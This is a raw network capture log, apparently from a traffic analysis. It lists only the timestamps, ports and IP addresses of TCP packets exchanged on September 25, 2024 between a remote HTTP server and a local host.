                                        Sep 25, 2024 18:40:31.558686018 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.558717012 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.558751106 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.558763027 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.558783054 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.558815956 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.558832884 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.558846951 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.558880091 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.558898926 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.558911085 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.558944941 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.558965921 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.558978081 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559027910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559061050 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559075117 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.559093952 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559102058 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.559127092 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559169054 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.559180975 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559212923 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559246063 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559273958 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.559278011 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559309959 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559341908 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559354067 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.559376001 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559395075 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.559483051 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559535027 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559568882 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559572935 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.559602022 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559618950 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.559633970 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559679031 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.559685946 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559719086 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559751987 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559762001 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.559802055 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559854984 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559864998 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.559890985 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559923887 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559932947 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.559957027 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.559989929 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560003042 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560023069 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560055971 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560082912 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560087919 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560118914 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560123920 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560163975 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560195923 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560210943 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560235977 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560271025 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560309887 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560313940 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560343981 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560352087 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560375929 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560408115 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560416937 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560441971 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560475111 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560507059 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560518026 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560539961 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560549974 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560575008 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560607910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560641050 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560651064 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560676098 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560686111 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560709000 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560741901 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560775042 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560785055 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560806990 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560816050 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560839891 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560873032 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560878038 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560904026 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560936928 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.560942888 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.560969114 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561002016 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561012983 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.561037064 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561069965 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561074018 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.561105013 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561136961 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561147928 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.561168909 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561201096 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561208010 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.561233997 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561265945 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561278105 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.561299086 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561331034 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561351061 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.561362982 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561394930 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561428070 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561433077 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.561460018 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561470032 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.561491966 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561526060 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561530113 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.561558008 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561590910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561625004 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561630011 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.561656952 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561688900 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.561700106 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.561722994 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.561723948 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.566649914 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.566703081 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.566752911 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.566754103 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.566807032 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.566809893 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.566840887 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.566874027 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.566884041 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.566911936 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.566943884 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.566975117 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.566978931 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.567011118 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.567019939 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.567044020 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.567106009 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.567115068 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.567140102 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.567173004 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.567205906 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.567219019 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.567240000 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.567246914 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.567276001 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.567496061 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.717138052 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.722170115 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722258091 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722312927 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722358942 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722367048 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.722409964 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722414970 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.722445011 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722477913 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722507954 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.722527981 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722564936 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.722582102 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722613096 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722645044 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722656012 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.722676039 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722723007 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.722726107 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722759962 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722791910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722800970 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.722843885 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722876072 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722887039 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.722959995 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722995043 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.722997904 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.723027945 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723061085 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723093987 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723099947 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.723133087 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.723140001 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723172903 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723206043 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723212004 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.723237991 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723270893 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723278046 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.723301888 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723335028 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723345995 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.723366976 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723457098 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723488092 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723496914 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.723539114 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723541021 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.723572016 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723603010 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723608971 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.723639965 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723673105 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723705053 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723715067 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.723737955 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723742962 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.723772049 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723803043 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723848104 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.723869085 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723907948 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.723921061 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723953009 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723985910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.723993063 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.724035978 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724069118 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724101067 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724108934 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.724133015 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724138021 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.724164963 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724215031 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724247932 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724255085 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.724287033 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.724298954 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724329948 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724366903 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724399090 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724406958 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.724433899 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724438906 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.724466085 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724500895 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724503994 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.724533081 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724567890 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724581957 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.724617958 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724649906 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724658012 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.724682093 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724714041 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724755049 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.724762917 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724797010 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724816084 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.724828959 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724864960 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724894047 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.724898100 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724931955 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724942923 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.724963903 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.724994898 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725008011 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.725028038 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725079060 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725080013 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.725110054 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725142956 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725173950 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725186110 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.725214958 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.725218058 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725250959 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725282907 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725315094 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725325108 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.725348949 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725352049 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.725382090 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725419998 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.725434065 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725466013 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725517988 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725552082 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725560904 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.725584984 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725589991 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.725634098 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725667000 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725697994 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725703001 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.725729942 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.725732088 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725781918 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725831985 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725862980 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725873947 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.725895882 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725900888 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.725928068 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725960970 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725992918 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.725997925 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.726026058 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.726031065 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.726078033 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.726115942 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.726128101 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.726161003 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.726197004 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.726210117 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.726241112 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.726280928 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.726293087 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.726344109 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.726376057 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.726423025 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.726428986 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.726454973 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.726459026 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.726488113 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.726536989 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.726555109 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.726568937 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.726610899 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.726644039 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.726660013 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.726684093 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.726694107 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.726743937 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.726778030 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.726785898 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.726809978 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.726841927 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.726876020 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.726878881 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.726908922 CEST8049716172.94.3.25192.168.2.6
